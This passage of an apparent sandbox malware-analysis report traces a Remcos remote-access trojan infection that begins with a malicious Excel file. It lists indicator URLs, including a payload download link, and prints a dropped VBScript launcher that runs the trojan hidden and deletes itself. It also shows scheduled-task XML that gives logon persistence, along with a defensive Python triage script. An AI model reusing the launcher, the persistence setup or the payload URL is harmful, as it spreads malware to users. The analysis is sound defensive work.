              | su boleta de citación (Nº 00946745 ).vbs      | malicious |
83.172.144.37 | 6Cprm97UTl.xls                                | malicious | bighoreca.nl/wp-content/themes/index/QPR-3067.exe
104.22.1.232  | http://cutt.ly/                               | malicious | cutt.ly/

                                                                      Domains


                                                                      ASN


                                                                      JA3 Fingerprints


                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):58936
                                                                      Entropy (8bit):7.994797855729196
                                                                      Encrypted:true
                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                      Malicious:false
                                                                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):326
                                                                      Entropy (8bit):3.107585226592965
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKd0MSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:GWkPlE99SNxAhUegeT2
                                                                      MD5:89AD6E148F32A00FEDC7288A635BF581
                                                                      SHA1:D1DE2367BE129CADD6BD1A2BA6D986ECE49F881E
                                                                      SHA-256:6D362B48AFD6CDC3CF0E6F5CF4ACA012E0C304A493D9CDECA7821477BA706670
                                                                      SHA-512:EBA4C7738635A87395F369F50F78B32BB27020D2184778940599CC64A4972D72A35DC362F75836DD399C065A295BFF0084D79139FBA5D66F051EA5D647214D48
                                                                      Malicious:false
                                                                      Preview (binary header followed by a UTF-16LE string; decoded): http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "0695559e2a0d61:0"  (the Windows certificate trust list download; the cab containing authroot.stl is the Content entry above)
                                                                      C:\Users\user\AppData\Local\Temp\2CFE0000
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):376797
                                                                      Entropy (8bit):7.991311231762346
                                                                      Encrypted:true
                                                                      SSDEEP:6144:ne+RqqVOMhdv2WY8hNduZYoFzFN0/5DC5GFvVxUX9eCnlAynPyEYT4c9r33iap:n9tOMzOH8ZoFzUOcFvwX9eepPZm4c9TN
                                                                      MD5:442B8C31C01CD099A86D738D8D616141
                                                                      SHA1:BCE32B3724A3E1766AD3592B67B9280D26BFEA26
                                                                      SHA-256:BF0BB5BC75AB3EF31A297C69FDB59AEC5865D813B2E49608FC4E315C1AB16103
                                                                      SHA-512:65500A0D75840FCAE4357E9FD5F6A6FB861CB13570C1612B605366B0AA278EEEC663BDD89147DE23442C21FABBD039A91E0C07C4BDD1021B2EAAA4A9902319E3
                                                                      Malicious:false
                                                                      Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\Cab5735.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):58936
                                                                      Entropy (8bit):7.994797855729196
                                                                      Encrypted:true
                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                      Malicious:false
                                                                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                      C:\Users\user\AppData\Local\Temp\Tar5736.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):152533
                                                                      Entropy (8bit):6.31602258454967
                                                                      Encrypted:false
                                                                      SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                      MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                      SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                      SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                      SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                      Malicious:false
                                                                      Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                      C:\Users\user\AppData\Local\Temp\install.vbs
                                                                      Process:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):418
                                                                      Entropy (8bit):3.480963687157218
                                                                      Encrypted:false
                                                                      SSDEEP:12:4D8o++ugypjBQMBvFQ4lOQ1MJhpE2F0M/0aimi:4Dh+S0FNOQqBE2F0Nait
                                                                      MD5:F6BF3BB1299A9BDA49FED7D26E2E9906
                                                                      SHA1:065B285FC471F5DB66AAE967016DAA022C1142F4
                                                                      SHA-256:2976F3C42F546776DBC6D8F32767C30B6C71199981E2F63E46C3812C0FEB37CA
                                                                      SHA-512:A5AE404B72F7C5B1BB1961CCBB419CB31F16472D7B9728BDC2E9FCA4E31B2BEE62B224A5944ECCA04DD8A423C3B6A62F209455BF1B0E582F41A56CA23BE32BC4
                                                                      Malicious:false
                                                                      Preview (UTF-16LE text, LF line endings; the dots between characters in the raw preview are the NUL bytes; decoded):
                                                                      WScript.Sleep 1000
                                                                      Set fso = CreateObject("Scripting.FileSystemObject")
                                                                      CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\Albus\AppData\Roaming\Remcos\remcos.exe""", 0
                                                                      fso.DeleteFile(Wscript.ScriptFullName)
                                                                      C:\Users\user\AppData\Local\Temp\tmp362D.tmp
                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1623
                                                                      Entropy (8bit):5.159516854402537
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBKShtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3cSz
                                                                      MD5:6BB09DA9B9954D91560A18EADB09ACCE
                                                                      SHA1:42A48847575D82331A5EAF972DFCDECAAD3E899B
                                                                      SHA-256:36334DE1D4562CDCAAC330EAEDF074A187AED5631DEBFB78726A9E50B8264214
                                                                      SHA-512:FF379E5DCC928D4E6D7B07C7924B65639DDBA2B15315C5E479026A8E0C2E790C1E3984670E686AB193CC831D74C1B92B2153D8FD7A9CCF3947F58DC594D20288
                                                                      Malicious:false
                                                                      Preview (CRLF line endings shown as ".." in the raw preview; preview ends mid-document):
                                                                      <?xml version="1.0" encoding="UTF-16"?>
                                                                      <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                                                                        <RegistrationInfo>
                                                                          <Date>2014-10-25T14:27:44.8929027</Date>
                                                                          <Author>user-PC\user</Author>
                                                                        </RegistrationInfo>
                                                                        <Triggers>
                                                                          <LogonTrigger>
                                                                            <Enabled>true</Enabled>
                                                                            <UserId>user-PC\user</UserId>
                                                                          </LogonTrigger>
                                                                          <RegistrationTrigger>
                                                                            <Enabled>false</Enabled>
                                                                          </RegistrationTrigger>
                                                                        </Triggers>
                                                                        <Principals>
                                                                          <Principal id="Author">
                                                                            <UserId>user-PC\user</UserId>
                                                                            <LogonType>InteractiveToken</LogonType>
                                                                            <RunLevel>LeastPrivilege</RunLevel>
                                                                          </Principal>
                                                                        </Principals>
                                                                        <Settings>
                                                                          <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                                                                          <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                                                                          <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                                                                          <AllowHardTerminate>false</AllowHardTerminate>
                                                                          <StartWhenAvailable>true</StartWhenAvailable>
                                                                      C:\Users\user\AppData\Local\Temp\tmp915.tmp
                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1623
                                                                      Entropy (8bit):5.159516854402537
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBKShtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3cSz
                                                                      MD5:6BB09DA9B9954D91560A18EADB09ACCE
                                                                      SHA1:42A48847575D82331A5EAF972DFCDECAAD3E899B
                                                                      SHA-256:36334DE1D4562CDCAAC330EAEDF074A187AED5631DEBFB78726A9E50B8264214
                                                                      SHA-512:FF379E5DCC928D4E6D7B07C7924B65639DDBA2B15315C5E479026A8E0C2E790C1E3984670E686AB193CC831D74C1B92B2153D8FD7A9CCF3947F58DC594D20288
                                                                      Malicious:false
                                                                      Preview (CRLF line endings shown as ".." in the raw preview; preview ends mid-document):
                                                                      <?xml version="1.0" encoding="UTF-16"?>
                                                                      <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                                                                        <RegistrationInfo>
                                                                          <Date>2014-10-25T14:27:44.8929027</Date>
                                                                          <Author>user-PC\user</Author>
                                                                        </RegistrationInfo>
                                                                        <Triggers>
                                                                          <LogonTrigger>
                                                                            <Enabled>true</Enabled>
                                                                            <UserId>user-PC\user</UserId>
                                                                          </LogonTrigger>
                                                                          <RegistrationTrigger>
                                                                            <Enabled>false</Enabled>
                                                                          </RegistrationTrigger>
                                                                        </Triggers>
                                                                        <Principals>
                                                                          <Principal id="Author">
                                                                            <UserId>user-PC\user</UserId>
                                                                            <LogonType>InteractiveToken</LogonType>
                                                                            <RunLevel>LeastPrivilege</RunLevel>
                                                                          </Principal>
                                                                        </Principals>
                                                                        <Settings>
                                                                          <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                                                                          <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                                                                          <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                                                                          <AllowHardTerminate>false</AllowHardTerminate>
                                                                          <StartWhenAvailable>true</StartWhenAvailable>
                                                                      C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp
                                                                      Process:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1623
                                                                      Entropy (8bit):5.159516854402537
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBKShtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3cSz
                                                                      MD5:6BB09DA9B9954D91560A18EADB09ACCE
                                                                      SHA1:42A48847575D82331A5EAF972DFCDECAAD3E899B
                                                                      SHA-256:36334DE1D4562CDCAAC330EAEDF074A187AED5631DEBFB78726A9E50B8264214
                                                                      SHA-512:FF379E5DCC928D4E6D7B07C7924B65639DDBA2B15315C5E479026A8E0C2E790C1E3984670E686AB193CC831D74C1B92B2153D8FD7A9CCF3947F58DC594D20288
                                                                      Malicious:true
                                                                      Preview (CRLF line endings shown as ".." in the raw preview; preview ends mid-document):
                                                                      <?xml version="1.0" encoding="UTF-16"?>
                                                                      <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                                                                        <RegistrationInfo>
                                                                          <Date>2014-10-25T14:27:44.8929027</Date>
                                                                          <Author>user-PC\user</Author>
                                                                        </RegistrationInfo>
                                                                        <Triggers>
                                                                          <LogonTrigger>
                                                                            <Enabled>true</Enabled>
                                                                            <UserId>user-PC\user</UserId>
                                                                          </LogonTrigger>
                                                                          <RegistrationTrigger>
                                                                            <Enabled>false</Enabled>
                                                                          </RegistrationTrigger>
                                                                        </Triggers>
                                                                        <Principals>
                                                                          <Principal id="Author">
                                                                            <UserId>user-PC\user</UserId>
                                                                            <LogonType>InteractiveToken</LogonType>
                                                                            <RunLevel>LeastPrivilege</RunLevel>
                                                                          </Principal>
                                                                        </Principals>
                                                                        <Settings>
                                                                          <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                                                                          <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                                                                          <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                                                                          <AllowHardTerminate>false</AllowHardTerminate>
                                                                          <StartWhenAvailable>true</StartWhenAvailable>
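Two of the dropped files above carry the persistence chain: install.vbs (written by sm.exe) starts the RAT binary through cmd with a hidden window and then deletes itself, and the three tmp*.tmp files are Task Scheduler definitions with an enabled LogonTrigger. The Python below is an added example for this report, not Joe Sandbox code and not anything from the Remcos sample. It rebuilds the bytes of install.vbs from the preview (the dots between characters are the NUL bytes of BOM-less UTF-16LE text; with LF line endings the rebuilt text is 209 characters, matching the 418 bytes reported), sniffs and decodes that encoding, extracts the launched executable, and checks a task XML for logon-trigger persistence into a user-writable directory. The task XML is constructed from the fields visible in the preview; its Actions element is an assumption, since the preview is cut off before that point, and the function names are mine.

```python
"""Triage of the install.vbs launcher and the tmp*.tmp task XML from the report.
Added example, not Joe Sandbox code. install.vbs is rebuilt from the preview
(UTF-16LE, no BOM); the task XML is constructed from the visible fields, and its
Actions element is an assumption because the preview stops before it."""
import codecs
import re
import xml.etree.ElementTree as ET

# install.vbs exactly as the preview shows it, including the hard-coded profile path.
INSTALL_VBS_TEXT = (
    'WScript.Sleep 1000\n'
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\Albus\\AppData\\Roaming\\Remcos\\remcos.exe""", 0\n'
    'fso.DeleteFile(Wscript.ScriptFullName)'
)
# 209 characters as UTF-16LE without BOM = 418 bytes, the size in the report.
INSTALL_VBS_BYTES = INSTALL_VBS_TEXT.encode("utf-16-le")

# Task XML: fields visible in the preview (trimmed); Actions is constructed (assumption).
TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user-PC\user</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>user-PC\user</UserId></LogonTrigger>
    <RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings><StartWhenAvailable>true</StartWhenAvailable></Settings>
  <!-- constructed for this example: the report's preview ends before Actions -->
  <Actions Context="Author">
    <Exec><Command>C:\Users\Albus\AppData\Roaming\Remcos\remcos.exe</Command></Exec>
  </Actions>
</Task>"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
WIN_EXE_PATH = re.compile(r'[A-Za-z]:\\[^"\r\n]*?\.exe', re.IGNORECASE)
XML_DECL = re.compile(r'^\s*<\?xml[^>]*\?>')


def sniff_and_decode(data: bytes) -> str:
    """Decode a dropped text file that `file` called 'data': honour a BOM first, then
    recognise BOM-less UTF-16LE by every odd byte being NUL, else fall back to UTF-8."""
    if data.startswith(codecs.BOM_UTF16_LE):
        return data[2:].decode("utf-16-le")
    if data.startswith(codecs.BOM_UTF16_BE):
        return data[2:].decode("utf-16-be")
    if len(data) >= 2 and len(data) % 2 == 0 and not any(data[1::2]):
        return data.decode("utf-16-le")
    return data.decode("utf-8", errors="replace")


def is_user_writable(path: str) -> bool:
    """Coarse test for locations a standard user can write to, i.e. persistence
    that needs no elevation (C:\\Users, AppData, Temp)."""
    p = path.lower()
    return p.startswith("c:\\users\\") or "\\appdata\\" in p or "\\temp\\" in p


def triage_launcher(data: bytes) -> dict:
    """Facts about a VBS launcher: executables it starts, whether the window is
    hidden (WshShell.Run's second argument is 0) and whether it deletes itself."""
    text = sniff_and_decode(data)
    targets = WIN_EXE_PATH.findall(text)
    lowered = text.lower()
    return {
        "targets": targets,
        "user_writable_target": any(is_user_writable(t) for t in targets),
        "hidden_window": re.search(r"\.Run\s.*,\s*0\s*$", text, re.M) is not None,
        "self_deletes": "deletefile" in lowered and "scriptfullname" in lowered,
    }


def task_persistence(xml_text: str) -> dict:
    """Persistence facts from a Task Scheduler XML: enabled logon trigger, run level,
    and whether the Exec command lives in a user-writable directory."""
    # The file declares encoding="UTF-16" although the report types it as ASCII text;
    # drop the declaration so the parser trusts the text it is actually given.
    root = ET.fromstring(XML_DECL.sub("", xml_text, count=1).lstrip())
    logon = root.findtext("t:Triggers/t:LogonTrigger/t:Enabled", default="", namespaces=NS)
    commands = [(c.text or "").strip() for c in root.findall("t:Actions/t:Exec/t:Command", NS)]
    return {
        "logon_trigger": logon.strip().lower() == "true",
        "run_level": root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS),
        "commands": commands,
        "user_writable_command": any(is_user_writable(c) for c in commands),
    }


if __name__ == "__main__":
    print(triage_launcher(INSTALL_VBS_BYTES))
    print(task_persistence(TASK_XML))
```

Run as a script it prints the two triage dictionaries; the interesting combination for this sample is a logon-triggered task at LeastPrivilege whose command sits under the user's AppData, which is exactly what a standard user can install without any prompt. The UTF-16 sniff matters because the same launcher, opened as Latin-1, would show "W.S.c.r.i.p.t" and defeat a plain string search for "remcos.exe".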
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 14:45:50 2021, atime=Wed Jan 6 14:45:50 2021, length=8192, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):867
                                                                      Entropy (8bit):4.473956273754622
                                                                      Encrypted:false
                                                                      SSDEEP:12:85QO7tCLgXg/XAlCPCHaXEKB8VXB/gUaX+WnicvbG+bDtZ3YilMMEpxRljKbTdJU:85h7tU/XT0K6VXWhYevDv3qKrNru/
                                                                      MD5:5A186F2F871702973006F88C51419168
                                                                      SHA1:004248FA92673AE0071D8C68CD42D41BE89A1791
                                                                      SHA-256:D0C4313F72D044F754441610BBB109F0BD5BF6EF94D1376A37214DB2D48C47B1
                                                                      SHA-512:1E564FC709B73DA9CB90378846B71E37D288E58E7F15AA0B381B6FEAF51CF121C56E0E5428601499A2FDC75984DF6A05588126715B0087E4E4C72365857348A7
                                                                      Malicious:false
                                                                      Preview: L..................F...........7G..p...C...p...C.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R.}..Desktop.d......QK.X&R.}*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Shipping Document PLBL003534.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:19 2020, mtime=Wed Jan 6 14:45:50 2021, atime=Wed Jan 6 14:45:50 2021, length=401920, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2208
                                                                      Entropy (8bit):4.577698022185074
                                                                      Encrypted:false
                                                                      SSDEEP:48:8a/XT0ZVXb491S/KQh2a/XT0ZVXb491S/KQ/:8a/XuVXb49c/KQh2a/XuVXb49c/KQ/
                                                                      MD5:F70C3EC3FD1C15F9C33B923AF691FCA1
                                                                      SHA1:9361F8EF8BF3F50485132D2B7A396E385C17771D
                                                                      SHA-256:A79182F7CBEDEB9D5F79BD3F233F821BC4867D2CB51AD32FAD0DB53B95A95BAD
                                                                      SHA-512:D87A9CB08F3AE00E13A411FCE4220D5EDA764DC4ADD0D569180947BC3184BCAD23CDEEB4D587CDC7629496A7354C60B13AAAC7E7893F0E81CB007513383FE35E
                                                                      Malicious:false
                                                                      Preview: L..................F.... .....R..{..p...C....}..C...."...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.."..&R.} .SHIPPI~1.XLS..n.......Q.y.Q.y*...8.....................S.h.i.p.p.i.n.g. .D.o.c.u.m.e.n.t. .P.L.B.L.0.0.3.5.3.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Shipping Document PLBL003534.xls.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.h.i.p.p.i.n.g. .D.o.c.u.m.e.n.t. .P.L.B.L.0.0.3.5.3.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):137
                                                                      Entropy (8bit):4.8830506311217645
                                                                      Encrypted:false
                                                                      SSDEEP:3:oyBVomMM2F3ClRpw64ouj2F3ClRpw64omMM2F3ClRpw64ov:dj6Mrrw9rrw6Mrrwy
                                                                      MD5:7EFD59FD92423426797351817322EA44
                                                                      SHA1:BA325691660E7CE3829BB1391495C749B900E391
                                                                      SHA-256:E07177B3DFBED767D9EF64208C479D088ACCC1BB0AE83998FB5F217B9DC765CF
                                                                      SHA-512:FA026314536D2BBAD7FA81ABC7F69EB99958246B39B71332E3FF941611C1A26823CFE453C6C7CCB38739660AE4E7A1A22E25DDC78BF18A72313A289C8DF99236
                                                                      Malicious:false
                                                                      Preview: Desktop.LNK=0..[xls]..Shipping Document PLBL003534.LNK=0..Shipping Document PLBL003534.LNK=0..[xls]..Shipping Document PLBL003534.LNK=0..
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BZONVEL56FNYZL2PBVU0.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.586853503054533
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCsMqmqvsqvJCwokz8hQCsMqmqvsEHyqvJCworqzUkDYjHPf8/kilUVuIu:cy7okz8yvHnorqzZ+f88AIu
                                                                      MD5:5A1B6FFDCFCDB3DE498E0E1EA2A0D0AB
                                                                      SHA1:81E308A28AAEED43667C8C82AEBB48021AD6E055
                                                                      SHA-256:D626EF1B89099C19723EB8C48402C3E45D92B0AA0698ADF8393360A72D4E4FB0
                                                                      SHA-512:0EE10776126CDA5DB0313E075B673F67E426BE0190CB34A917817F7221930A46E06999546C155780A084584461718BDE96841B567FA99EE40C08E7AA2210C6B1
                                                                      Malicious:false
